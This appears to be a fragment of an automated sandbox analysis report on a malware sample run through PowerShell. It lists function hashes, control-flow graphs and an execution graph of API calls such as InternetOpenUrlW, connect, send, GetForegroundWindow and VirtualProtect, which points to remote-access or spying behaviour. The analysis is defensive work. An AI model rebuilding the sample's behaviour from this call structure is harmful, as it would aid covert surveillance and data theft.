                                          • API String ID: 947044025-0
                                          • Opcode ID: f5547b8dcdd944046d771e7eb1bb8713a73413e0b8ce10a9e0ca439c5c7713ee
                                          • Instruction ID: 295d7287435a7651cd984624c0945b0a4f7545dbc1b608a6ad9de3a1e1034a9e
                                          • Opcode Fuzzy Hash: f5547b8dcdd944046d771e7eb1bb8713a73413e0b8ce10a9e0ca439c5c7713ee
                                          • Instruction Fuzzy Hash: 2621CAB5D142499FCB10CFA9D884ADEFBF0EB4A320F24906AE818B7311C374A945CF64
                                          Function 00211790 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 246 211790-216156 ResumeThread 248 216158-21615e 246->248 249 21615f-21618d 246->249 248->249
                                          APIs
                                          • ResumeThread.KERNELBASE(?), ref: 00216146
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393625374.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_210000_powershell.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: f13c69301152adc399866d3d677256897d03f1048956b25a79b704e50e673906
                                          • Instruction ID: d48a739bf8121d9d4a1b90aefaf03879dc2a84662535383cfadc2a5b9ddfe35d
                                          • Opcode Fuzzy Hash: f13c69301152adc399866d3d677256897d03f1048956b25a79b704e50e673906
                                          • Instruction Fuzzy Hash: 982197B4D102199FCB10CFA9D888ADEFBF4EB59314F24902AE818B7310D375A945CFA4
                                          Function 006C1730 Relevance: .1, Instructions: 126COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 584 6c1730-6c1733 585 6c1739-6c1741 584->585 586 6c1735-6c1737 584->586 587 6c1759-6c175d 585->587 588 6c1743-6c1749 585->588 586->585 591 6c188e-6c1898 587->591 592 6c1763-6c1765 587->592 589 6c174d-6c1757 588->589 590 6c174b 588->590 589->587 590->587 593 6c189a-6c18a3 591->593 594 6c18a6-6c18ac 591->594 595 6c1775 592->595 596 6c1767-6c1773 592->596 598 6c18ae-6c18b0 594->598 599 6c18b2-6c18be 594->599 597 6c1777-6c1779 595->597 596->597 597->591 601 6c177f-6c1783 597->601 602 6c18c0-6c18df 598->602 599->602 603 6c1785-6c1794 601->603 604 6c1796 601->604 606 6c1798-6c179a 603->606 604->606 606->591 608 6c17a0-6c17a2 606->608 609 6c17a4-6c17b0 608->609 610 6c17b2 608->610 612 6c17b4-6c17b6 609->612 610->612 612->591 613 6c17bc-6c17be 612->613 614 6c17d8-6c17e3 613->614 615 6c17c0-6c17c6 613->615 616 6c17e5-6c17e8 614->616 617 6c17f2-6c17fe 614->617 618 6c17c8 615->618 619 6c17ca-6c17d6 615->619 616->617 620 6c180c-6c1813 617->620 621 6c1800-6c1802 617->621 618->614 619->614 623 6c181a-6c181c 620->623 621->620 624 6c181e-6c1824 623->624 625 6c1834-6c188b 623->625 626 6c1828-6c182a 624->626 627 6c1826 624->627 626->625 627->625
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c638d75cdd4102e343f7d5f3534477f5c0535771162181abfe6fca62f970dac
                                          • Instruction ID: 3ecd558890c063ac4b065e920649b663ba4c21993c3ea408673a932a8bc8a40d
                                          • Opcode Fuzzy Hash: 4c638d75cdd4102e343f7d5f3534477f5c0535771162181abfe6fca62f970dac
                                          • Instruction Fuzzy Hash: B3410135709201DBDB294A248410BFAB7A3EF93321B6885AFD8558F392EB74CD42C771
                                          Function 006C0DD3 Relevance: .1, Instructions: 100COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e3577a03c36a6d9550cabf9421c2b7f4d77a024c632dc06a536939b55db2340d
                                          • Instruction ID: c3c135da4b5139f6cae0a89b6ee229b18058c7985109a853af2a672310cd352d
                                          • Opcode Fuzzy Hash: e3577a03c36a6d9550cabf9421c2b7f4d77a024c632dc06a536939b55db2340d
                                          • Instruction Fuzzy Hash: A2312832784301CFEB259A64C450BFAB7A3EF99311B2488AED446CB351DB75CC82C751
                                          Function 001BD006 Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393606481.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_1bd000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96435111b0455f36bd73616994eb657c7a4e747a0ae8c2325e12a63a4998a292
                                          • Instruction ID: e88ca081da19da11e789cd7a45b1d506770135917eaf6f08b0f1a780d4fa2a8f
                                          • Opcode Fuzzy Hash: 96435111b0455f36bd73616994eb657c7a4e747a0ae8c2325e12a63a4998a292
                                          • Instruction Fuzzy Hash: DE0157610093C09FD7168A259884692BFA4EF53624F1985CBE8888F1A3D3695C44CB72
                                          Function 001BD01D Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393606481.00000000001BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001BD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_1bd000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 004c7b4562f51ec967f6c1682be96614208191edabad2baeb9ae3c2e0d63d79a
                                          • Instruction ID: 1061c2e34fc4ef40444f03949e4bbf27682e7e73195227125f6c54c3063a60b2
                                          • Opcode Fuzzy Hash: 004c7b4562f51ec967f6c1682be96614208191edabad2baeb9ae3c2e0d63d79a
                                          • Instruction Fuzzy Hash: 5E01D430104340EAE7285E15D8847A6BB98DF41764F18C416FC480B182D3799941CAB1
                                          Function 006C1B7F Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d8e339440ba200d9ed311311a43a33222c048263a62fe5d1be83762f818be14
                                          • Instruction ID: 84f3da561ad9e5f3106a05220be852b40e7ec01785b1f219f753952f80a3d76e
                                          • Opcode Fuzzy Hash: 1d8e339440ba200d9ed311311a43a33222c048263a62fe5d1be83762f818be14
                                          • Instruction Fuzzy Hash: 8EE0D831B44344CFDF29666090617FD7752EFA3251F1081EAD4509B757DA348C16C762

                                          Non-executed Functions

                                          Function 006C00A0 Relevance: 15.4, Strings: 12, Instructions: 394COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.393659857.00000000006C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6c0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (:H$(:H$(:H$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:H$L:H$L:H
                                          • API String ID: 0-1930158942
                                          • Opcode ID: 4b6c8d88fbd973a9f96fb89ac3aa753bb0b2bd6c9b5b5d0e1cac1524ef12a264
                                          • Instruction ID: 6c4446d28a964da84a93889df2ac7312548aa54f163bb2e1d6da8d78b16d5525
                                          • Opcode Fuzzy Hash: 4b6c8d88fbd973a9f96fb89ac3aa753bb0b2bd6c9b5b5d0e1cac1524ef12a264
                                          • Instruction Fuzzy Hash: C0D1F331700244EBEB159FA8D850BBE7BA7EF84310F18C46AE9459B392DB74DE41C7A1

                                          Execution Graph

                                          Execution Coverage:6.3%
                                          Dynamic/Decrypted Code Coverage:15.6%
                                          Signature Coverage:3.2%
                                          Total number of Nodes:1922
                                          Total number of Limit Nodes:44
                                          execution_graph 53073 415d41 53088 41b411 53073->53088 53075 415d4a 53099 4020f6 53075->53099 53080 4170c4 53123 401e8d 53080->53123 53084 401fd8 11 API calls 53085 4170d9 53084->53085 53086 401fd8 11 API calls 53085->53086 53087 4170e5 53086->53087 53129 4020df 53088->53129 53093 41b456 InternetReadFile 53098 41b479 53093->53098 53094 41b4a6 InternetCloseHandle InternetCloseHandle 53096 41b4b8 53094->53096 53096->53075 53097 401fd8 11 API calls 53097->53098 53098->53093 53098->53094 53098->53097 53140 4020b7 53098->53140 53100 40210c 53099->53100 53101 4023ce 11 API calls 53100->53101 53102 402126 53101->53102 53103 402569 28 API calls 53102->53103 53104 402134 53103->53104 53105 404aa1 53104->53105 53106 404ab4 53105->53106 53207 40520c 53106->53207 53108 404ac9 ctype 53109 404b40 WaitForSingleObject 53108->53109 53110 404b20 53108->53110 53112 404b56 53109->53112 53111 404b32 send 53110->53111 53114 404b7b 53111->53114 53213 4210cb 54 API calls 53112->53213 53116 401fd8 11 API calls 53114->53116 53115 404b69 SetEvent 53115->53114 53117 404b83 53116->53117 53118 401fd8 11 API calls 53117->53118 53119 404b8b 53118->53119 53119->53080 53120 401fd8 53119->53120 53121 4023ce 11 API calls 53120->53121 53122 401fe1 53121->53122 53122->53080 53124 402163 53123->53124 53128 40219f 53124->53128 53231 402730 11 API calls 53124->53231 53126 402184 53232 402712 11 API calls std::_Deallocate 53126->53232 53128->53084 53130 4020e7 53129->53130 53146 4023ce 53130->53146 53132 4020f2 53133 43bda0 53132->53133 53138 4461b8 ___crtLCMapStringA 53133->53138 53134 4461f6 53162 44062d 20 API calls _abort 53134->53162 53135 4461e1 RtlAllocateHeap 53137 41b42f InternetOpenW InternetOpenUrlW 53135->53137 53135->53138 53137->53093 53138->53134 53138->53135 53161 443001 7 API calls 2 library calls 53138->53161 53141 4020bf 53140->53141 53142 4023ce 11 API calls 53141->53142 53143 4020ca 53142->53143 53163 40250a 53143->53163 53145 4020d9 53145->53098 53147 402428 53146->53147 53148 4023d8 53146->53148 53147->53132 53148->53147 53150 4027a7 53148->53150 53151 402e21 53150->53151 53154 4016b4 53151->53154 53153 402e30 53153->53147 53156 4016c6 53154->53156 53157 4016cb 53154->53157 53155 4016f3 53155->53153 53160 43bd68 11 API calls _abort 53156->53160 53157->53155 53157->53156 53159 43bd67 53160->53159 53161->53138 53162->53137 53164 40251a 53163->53164 53165 402520 53164->53165 53166 402535 53164->53166 53170 402569 53165->53170 53180 4028e8 53166->53180 53168 402533 53168->53145 53191 402888 53170->53191 53172 40257d 53173 402592 53172->53173 53174 4025a7 53172->53174 53196 402a34 22 API calls 53173->53196 53175 4028e8 28 API calls 53174->53175 53179 4025a5 53175->53179 53177 40259b 53197 4029da 22 API calls 53177->53197 53179->53168 53181 4028f1 53180->53181 53182 402953 53181->53182 53183 4028fb 53181->53183 53205 4028a4 22 API calls 53182->53205 53186 402904 53183->53186 53188 402917 53183->53188 53199 402cae 53186->53199 53187 402915 53187->53168 53188->53187 53190 4023ce 11 API calls 53188->53190 53190->53187 53192 402890 53191->53192 53193 402898 53192->53193 53198 402ca3 22 API calls 53192->53198 53193->53172 53196->53177 53197->53179 53200 402cb8 __EH_prolog 53199->53200 53206 402e54 22 API calls 53200->53206 53202 4023ce 11 API calls 53204 402d92 53202->53204 53203 402d24 53203->53202 53204->53187 53206->53203 53208 405214 53207->53208 53209 4023ce 11 API calls 53208->53209 53210 40521f 53209->53210 53214 405234 53210->53214 53212 40522e 53212->53108 53213->53115 53215 405240 53214->53215 53216 40526e 53214->53216 53217 4028e8 28 API calls 53215->53217 53230 4028a4 22 API calls 53216->53230 53220 40524a 53217->53220 53220->53212 53231->53126 53232->53128 53233 10006d60 53234 10006d69 53233->53234 53236 10006d72 53233->53236 53237 10006c5f 53234->53237 53257 10005af6 GetLastError 53237->53257 53239 10006c6c 53277 10006d7e 53239->53277 53241 10006c74 53286 100069f3 53241->53286 53244 10006c8b 53244->53236 53247 10006cce 53311 1000571e 19 API calls __dosmaperr 53247->53311 53251 10006cc9 53310 10006368 19 API calls __dosmaperr 53251->53310 53253 10006d12 53253->53247 53313 100068c9 25 API calls 53253->53313 53254 10006ce6 53254->53253 53312 1000571e 19 API calls __dosmaperr 53254->53312 53258 10005b12 53257->53258 53259 10005b0c 53257->53259 53263 10005b61 SetLastError 53258->53263 53315 1000637b 19 API calls 2 library calls 53258->53315 53314 10005e08 10 API calls 2 library calls 53259->53314 53262 10005b24 53264 10005b2c 53262->53264 53317 10005e5e 10 API calls 2 library calls 53262->53317 53263->53239 53316 1000571e 19 API calls __dosmaperr 53264->53316 53266 10005b41 53266->53264 53268 10005b48 53266->53268 53318 1000593c 19 API calls _abort 53268->53318 53269 10005b32 53270 10005b6d SetLastError 53269->53270 53320 100055a8 36 API calls _abort 53270->53320 53272 10005b53 53319 1000571e 19 API calls __dosmaperr 53272->53319 53276 10005b5a 53276->53263 53276->53270 53278 10006d8a ___DestructExceptionObject 53277->53278 53279 10005af6 _abort 36 API calls 53278->53279 53284 10006d94 53279->53284 53281 10006e18 _abort 53281->53241 53284->53281 53321 100055a8 36 API calls _abort 53284->53321 53322 10005671 RtlEnterCriticalSection 53284->53322 53323 1000571e 19 API calls __dosmaperr 53284->53323 53324 10006e0f RtlLeaveCriticalSection _abort 53284->53324 53325 100054a7 53286->53325 53289 10006a14 GetOEMCP 53291 10006a3d 53289->53291 53290 10006a26 53290->53291 53292 10006a2b GetACP 53290->53292 53291->53244 53293 100056d0 53291->53293 53292->53291 53294 1000570e 53293->53294 53298 100056de _abort 53293->53298 53336 10006368 19 API calls __dosmaperr 53294->53336 53295 100056f9 RtlAllocateHeap 53297 1000570c 53295->53297 53295->53298 53297->53247 53300 10006e20 53297->53300 53298->53294 53298->53295 53335 1000474f 7 API calls 2 library calls 53298->53335 53301 100069f3 38 API calls 53300->53301 53304 10006e3f 53301->53304 53302 10006e46 53347 10002ada 53302->53347 53303 10006eb5 ___scrt_fastfail 53337 10006acb GetCPInfo 53303->53337 53304->53302 53304->53303 53307 10006e90 IsValidCodePage 53304->53307 53306 10006cc1 53306->53251 53306->53254 53307->53302 53308 10006ea2 GetCPInfo 53307->53308 53308->53302 53308->53303 53310->53247 53311->53244 53312->53253 53313->53247 53314->53258 53315->53262 53316->53269 53317->53266 53318->53272 53319->53276 53322->53284 53323->53284 53324->53284 53326 100054c4 53325->53326 53332 100054ba 53325->53332 53327 10005af6 _abort 36 API calls 53326->53327 53326->53332 53328 100054e5 53327->53328 53333 10007a00 36 API calls __fassign 53328->53333 53330 100054fe 53334 10007a2d 36 API calls __fassign 53330->53334 53332->53289 53332->53290 53333->53330 53334->53332 53335->53298 53336->53297 53343 10006b05 53337->53343 53346 10006baf 53337->53346 53340 10002ada _ValidateLocalCookies 5 API calls 53342 10006c5b 53340->53342 53342->53302 53354 100086e4 53343->53354 53345 10008a3e 41 API calls 53345->53346 53346->53340 53348 10002ae3 53347->53348 53349 10002ae5 IsProcessorFeaturePresent 53347->53349 53348->53306 53351 10002b58 53349->53351 53424 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53351->53424 53353 10002c3b 53353->53306 53355 100054a7 __fassign 36 API calls 53354->53355 53356 10008704 MultiByteToWideChar 53355->53356 53358 10008742 53356->53358 53366 100087da 53356->53366 53360 100056d0 20 API calls 53358->53360 53364 10008763 ___scrt_fastfail 53358->53364 53359 10002ada _ValidateLocalCookies 5 API calls 53361 10006b66 53359->53361 53360->53364 53368 10008a3e 53361->53368 53362 100087d4 53373 10008801 19 API calls _free 53362->53373 53364->53362 53365 100087a8 MultiByteToWideChar 53364->53365 53365->53362 53367 100087c4 GetStringTypeW 53365->53367 53366->53359 53367->53362 53369 100054a7 __fassign 36 API calls 53368->53369 53370 10008a51 53369->53370 53374 10008821 53370->53374 53373->53366 53375 1000883c 53374->53375 53376 10008862 MultiByteToWideChar 53375->53376 53377 10008a16 53376->53377 53378 1000888c 53376->53378 53379 10002ada _ValidateLocalCookies 5 API calls 53377->53379 53382 100056d0 20 API calls 53378->53382 53384 100088ad 53378->53384 53380 10006b87 53379->53380 53380->53345 53381 100088f6 MultiByteToWideChar 53383 1000890f 53381->53383 53400 10008962 53381->53400 53382->53384 53401 10005f19 53383->53401 53384->53381 53384->53400 53388 10008971 53390 10008992 53388->53390 53391 100056d0 20 API calls 53388->53391 53389 10008939 53392 10005f19 10 API calls 53389->53392 53389->53400 53393 10008a07 53390->53393 53395 10005f19 10 API calls 53390->53395 53391->53390 53392->53400 53409 10008801 19 API calls _free 53393->53409 53396 100089e6 53395->53396 53396->53393 53397 100089f5 WideCharToMultiByte 53396->53397 53397->53393 53398 10008a35 53397->53398 53411 10008801 19 API calls _free 53398->53411 53410 10008801 19 API calls _free 53400->53410 53412 10005c45 53401->53412 53403 10005f40 53406 10005f49 53403->53406 53416 10005fa1 9 API calls 2 library calls 53403->53416 53405 10005f89 LCMapStringW 53405->53406 53407 10002ada _ValidateLocalCookies 5 API calls 53406->53407 53408 10005f9b 53407->53408 53408->53388 53408->53389 53408->53400 53409->53400 53410->53377 53411->53400 53414 10005c71 53412->53414 53415 10005c75 __crt_fast_encode_pointer 53412->53415 53414->53415 53417 10005ce1 53414->53417 53415->53403 53416->53405 53418 10005d02 LoadLibraryExW 53417->53418 53422 10005cf7 53417->53422 53419 10005d37 53418->53419 53420 10005d1f GetLastError 53418->53420 53419->53422 53423 10005d4e FreeLibrary 53419->53423 53420->53419 53421 10005d2a LoadLibraryExW 53420->53421 53421->53419 53422->53414 53423->53422 53424->53353 53425 434906 53430 434bd8 SetUnhandledExceptionFilter 53425->53430 53427 43490b pre_c_initialization 53431 4455cc 20 API calls 2 library calls 53427->53431 53429 434916 53430->53427 53431->53429 53432 416be6 53452 401e65 53432->53452 53434 416bf2 53435 416c07 53434->53435 53436 416c1e 53434->53436 53437 401e65 22 API calls 53435->53437 53438 401e65 22 API calls 53436->53438 53439 416c0c 53437->53439 53440 416c23 53438->53440 53441 4020f6 28 API calls 53439->53441 53442 4020f6 28 API calls 53440->53442 53443 416c17 53441->53443 53442->53443 53457 417308 53443->53457 53446 401e8d 11 API calls 53447 4170cd 53446->53447 53448 401fd8 11 API calls 53447->53448 53449 4170d9 53448->53449 53450 401fd8 11 API calls 53449->53450 53451 4170e5 53450->53451 53453 401e6d 53452->53453 53454 401e75 53453->53454 53491 402158 22 API calls 53453->53491 53454->53434 53458 4174c0 53457->53458 53459 41731e 53457->53459 53461 401fd8 11 API calls 53458->53461 53492 4046f7 53459->53492 53463 416c38 53461->53463 53463->53446 53466 4174b2 53601 404ee2 99 API calls 53466->53601 53471 417365 53568 402ea1 53471->53568 53474 404aa1 61 API calls 53475 417380 53474->53475 53476 401fd8 11 API calls 53475->53476 53477 417388 53476->53477 53478 401fd8 11 API calls 53477->53478 53488 417390 53478->53488 53481 4020b7 28 API calls 53481->53488 53483 41bdaf 28 API calls 53483->53488 53484 402ea1 28 API calls 53484->53488 53485 404aa1 61 API calls 53485->53488 53486 401fd8 11 API calls 53486->53488 53488->53481 53488->53483 53488->53484 53488->53485 53488->53486 53489 4174a7 53488->53489 53577 41b80c GlobalMemoryStatusEx 53488->53577 53578 41b890 GetSystemTimes Sleep GetSystemTimes 53488->53578 53580 41bb27 53488->53580 53585 401f09 53488->53585 53588 404e26 WaitForSingleObject 53489->53588 53493 4020df 11 API calls 53492->53493 53494 404707 53493->53494 53495 4020df 11 API calls 53494->53495 53496 40471e 53495->53496 53497 404736 53496->53497 53602 40482d 53496->53602 53499 4048c8 connect 53497->53499 53500 404a1b 53499->53500 53501 4048ee 53499->53501 53502 40497e 53500->53502 53503 404a21 WSAGetLastError 53500->53503 53501->53502 53504 404923 53501->53504 53610 40531e 53501->53610 53502->53466 53559 41bdaf 53502->53559 53503->53502 53505 404a31 53503->53505 53645 420cf1 27 API calls 53504->53645 53507 404932 53505->53507 53508 404a36 53505->53508 53513 402093 28 API calls 53507->53513 53650 41cb72 30 API calls 53508->53650 53510 40490f 53615 402093 53510->53615 53512 40492b 53512->53507 53516 404941 53512->53516 53517 404a80 53513->53517 53515 404a40 53651 4052fd 28 API calls 53515->53651 53523 404950 53516->53523 53524 404987 53516->53524 53520 402093 28 API calls 53517->53520 53525 404a8f 53520->53525 53527 402093 28 API calls 53523->53527 53647 421ad1 54 API calls 53524->53647 53528 41b580 80 API calls 53525->53528 53531 40495f 53527->53531 53528->53502 53534 402093 28 API calls 53531->53534 53532 40498f 53535 4049c4 53532->53535 53536 404994 53532->53536 53540 40496e 53534->53540 53649 420e97 28 API calls 53535->53649 53538 402093 28 API calls 53536->53538 53542 4049a3 53538->53542 53543 41b580 80 API calls 53540->53543 53545 402093 28 API calls 53542->53545 53546 404973 53543->53546 53544 4049cc 53547 4049f9 CreateEventW CreateEventW 53544->53547 53549 402093 28 API calls 53544->53549 53548 4049b2 53545->53548 53646 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53546->53646 53547->53502 53550 41b580 80 API calls 53548->53550 53552 4049e2 53549->53552 53553 4049b7 53550->53553 53554 402093 28 API calls 53552->53554 53648 421143 52 API calls 53553->53648 53556 4049f1 53554->53556 53557 41b580 80 API calls 53556->53557 53558 4049f6 53557->53558 53558->53547 53560 41bdbc 53559->53560 53561 4020b7 28 API calls 53560->53561 53562 41734f 53561->53562 53563 402f31 53562->53563 53564 4020df 11 API calls 53563->53564 53565 402f3d 53564->53565 53566 4032a0 28 API calls 53565->53566 53567 402f59 53566->53567 53567->53471 53573 402eb0 53568->53573 53569 402ef2 53570 401fb0 28 API calls 53569->53570 53571 402ef0 53570->53571 53572 402055 11 API calls 53571->53572 53574 402f09 53572->53574 53573->53569 53575 402ee7 53573->53575 53574->53474 53710 403365 28 API calls 53575->53710 53577->53488 53579 41b8d5 _swprintf __aulldiv 53578->53579 53579->53488 53711 436f10 53580->53711 53586 402252 11 API calls 53585->53586 53587 401f12 53586->53587 53587->53488 53589 404e40 SetEvent CloseHandle 53588->53589 53590 404e57 closesocket 53588->53590 53591 404ed8 53589->53591 53592 404e64 53590->53592 53591->53466 53593 404e7a 53592->53593 53766 4050e4 84 API calls 53592->53766 53594 404e8c WaitForSingleObject 53593->53594 53595 404ece SetEvent CloseHandle 53593->53595 53767 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53594->53767 53595->53591 53598 404e9b SetEvent WaitForSingleObject 53768 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53598->53768 53600 404eb3 SetEvent CloseHandle CloseHandle 53600->53595 53603 404846 socket 53602->53603 53604 404839 53602->53604 53605 404860 CreateEventW 53603->53605 53606 404842 53603->53606 53609 40489e WSAStartup 53604->53609 53605->53497 53606->53497 53608 40483e 53608->53603 53608->53606 53609->53608 53611 4020df 11 API calls 53610->53611 53612 40532a 53611->53612 53652 4032a0 53612->53652 53614 405346 53614->53510 53616 40209b 53615->53616 53617 4023ce 11 API calls 53616->53617 53618 4020a6 53617->53618 53656 4024ed 53618->53656 53621 41b580 53622 41b631 53621->53622 53623 41b596 GetLocalTime 53621->53623 53624 401fd8 11 API calls 53622->53624 53625 40531e 28 API calls 53623->53625 53626 41b639 53624->53626 53627 41b5d8 53625->53627 53629 401fd8 11 API calls 53626->53629 53660 406383 53627->53660 53631 41b641 53629->53631 53631->53504 53634 406383 28 API calls 53635 41b5fc 53634->53635 53670 40723b 77 API calls 53635->53670 53637 41b60a 53638 401fd8 11 API calls 53637->53638 53639 41b616 53638->53639 53640 401fd8 11 API calls 53639->53640 53641 41b61f 53640->53641 53642 401fd8 11 API calls 53641->53642 53643 41b628 53642->53643 53644 401fd8 11 API calls 53643->53644 53644->53622 53645->53512 53646->53502 53647->53532 53648->53546 53649->53544 53650->53515 53654 4032aa 53652->53654 53653 4032c9 53653->53614 53654->53653 53655 4028e8 28 API calls 53654->53655 53655->53653 53657 4024f9 53656->53657 53658 40250a 28 API calls 53657->53658 53659 4020b1 53658->53659 53659->53621 53671 4051ef 53660->53671 53662 406391 53675 402055 53662->53675 53665 402f10 53707 401fb0 53665->53707 53667 402f1e 53668 402055 11 API calls 53667->53668 53669 402f2d 53668->53669 53669->53634 53670->53637 53672 4051fb 53671->53672 53681 405274 53672->53681 53674 405208 53674->53662 53676 402061 53675->53676 53677 4023ce 11 API calls 53676->53677 53678 40207b 53677->53678 53703 40267a 53678->53703 53682 405282 53681->53682 53683 405288 53682->53683 53684 40529e 53682->53684 53692 4025f0 53683->53692 53686 4052f5 53684->53686 53687 4052b6 53684->53687 53701 4028a4 22 API calls 53686->53701 53690 4028e8 28 API calls 53687->53690 53691 40529c 53687->53691 53690->53691 53691->53674 53693 402888 22 API calls 53692->53693 53694 402602 53693->53694 53695 402672 53694->53695 53696 402629 53694->53696 53702 4028a4 22 API calls 53695->53702 53699 4028e8 28 API calls 53696->53699 53700 40263b 53696->53700 53699->53700 53700->53691 53704 40268b 53703->53704 53705 4023ce 11 API calls 53704->53705 53706 40208d 53705->53706 53706->53665 53708 4025f0 28 API calls 53707->53708 53709 401fbd 53708->53709 53709->53667 53710->53571 53712 41bb46 GetForegroundWindow GetWindowTextW 53711->53712 53713 40417e 53712->53713 53714 404186 53713->53714 53719 402252 53714->53719 53716 404191 53723 4041bc 53716->53723 53720 40225c 53719->53720 53721 4022ac 53719->53721 53720->53721 53727 402779 11 API calls std::_Deallocate 53720->53727 53721->53716 53724 4041c8 53723->53724 53728 4041d9 53724->53728 53726 40419c 53726->53488 53727->53721 53729 4041e9 53728->53729 53730 404206 53729->53730 53731 4041ef 53729->53731 53745 4027e6 53730->53745 53735 404267 53731->53735 53734 404204 53734->53726 53736 402888 22 API calls 53735->53736 53737 40427b 53736->53737 53738 404290 53737->53738 53739 4042a5 53737->53739 53756 4042df 22 API calls 53738->53756 53740 4027e6 28 API calls 53739->53740 53744 4042a3 53740->53744 53742 404299 53757 402c48 22 API calls 53742->53757 53744->53734 53746 4027ef 53745->53746 53747 402851 53746->53747 53748 4027f9 53746->53748 53764 4028a4 22 API calls 53747->53764 53751 402802 53748->53751 53752 402815 53748->53752 53758 402aea 53751->53758 53754 402813 53752->53754 53755 402252 11 API calls 53752->53755 53754->53734 53755->53754 53756->53742 53757->53744 53759 402af4 __EH_prolog 53758->53759 53765 402e45 22 API calls 53759->53765 53761 402252 11 API calls 53763 402bce 53761->53763 53762 402b60 53762->53761 53763->53754 53765->53762 53766->53593 53767->53598 53768->53600 53769 1000c7a7 53770 1000c7be 53769->53770 53775 1000c82c 53769->53775 53770->53775 53779 1000c7e6 GetModuleHandleA 53770->53779 53771 1000c872 53772 1000c835 GetModuleHandleA 53774 1000c83f 53772->53774 53774->53774 53774->53775 53775->53771 53775->53772 53780 1000c7ef 53779->53780 53786 1000c82c 53779->53786 53789 1000c803 53780->53789 53782 1000c872 53783 1000c835 GetModuleHandleA 53784 1000c83f 53783->53784 53784->53784 53784->53786 53786->53782 53786->53783 53790 1000c809 53789->53790 53791 1000c82c 53790->53791 53792 1000c80d VirtualProtect 53790->53792 53794 1000c872 53791->53794 53795 1000c835 GetModuleHandleA 53791->53795 53792->53791 53793 1000c81c VirtualProtect 53792->53793 53793->53791 53796 1000c83f 53795->53796 53796->53791 53797 43bea8 53800 43beb4 _swprintf ___scrt_is_nonwritable_in_current_image 53797->53800 53798 43bec2 53813 44062d 20 API calls _abort 53798->53813 53800->53798 53801 43beec 53800->53801 53808 445909 EnterCriticalSection 53801->53808 53803 43bec7 pre_c_initialization ___scrt_is_nonwritable_in_current_image 53804 43bef7 53809 43bf98 53804->53809 53808->53804 53810 43bfa6 53809->53810 53810->53810 53812 43bf02 53810->53812 53815 4497ec 37 API calls 2 library calls 53810->53815 53814 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53812->53814 53813->53803 53814->53803 53815->53810 53816 4458c8 53818 4458d3 53816->53818 53819 4458fc 53818->53819 53820 4458f8 53818->53820 53822 448b04 53818->53822 53829 445920 DeleteCriticalSection 53819->53829 53830 44854a 53822->53830 53825 448b49 InitializeCriticalSectionAndSpinCount 53828 448b34 53825->53828 53827 448b60 53827->53818 53837 43502b 53828->53837 53829->53820 53831 448576 53830->53831 53832 44857a 53830->53832 53831->53832 53833 44859a 53831->53833 53844 4485e6 53831->53844 53832->53825 53832->53828 53833->53832 53835 4485a6 GetProcAddress 53833->53835 53836 4485b6 __crt_fast_encode_pointer 53835->53836 53836->53832 53838 435036 IsProcessorFeaturePresent 53837->53838 53839 435034 53837->53839 53841 435078 53838->53841 53839->53827 53851 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53841->53851 53843 43515b 53843->53827 53845 448607 LoadLibraryExW 53844->53845 53850 4485fc 53844->53850 53846 448624 GetLastError 53845->53846 53847 44863c 53845->53847 53846->53847 53848 44862f LoadLibraryExW 53846->53848 53849 448653 FreeLibrary 53847->53849 53847->53850 53848->53847 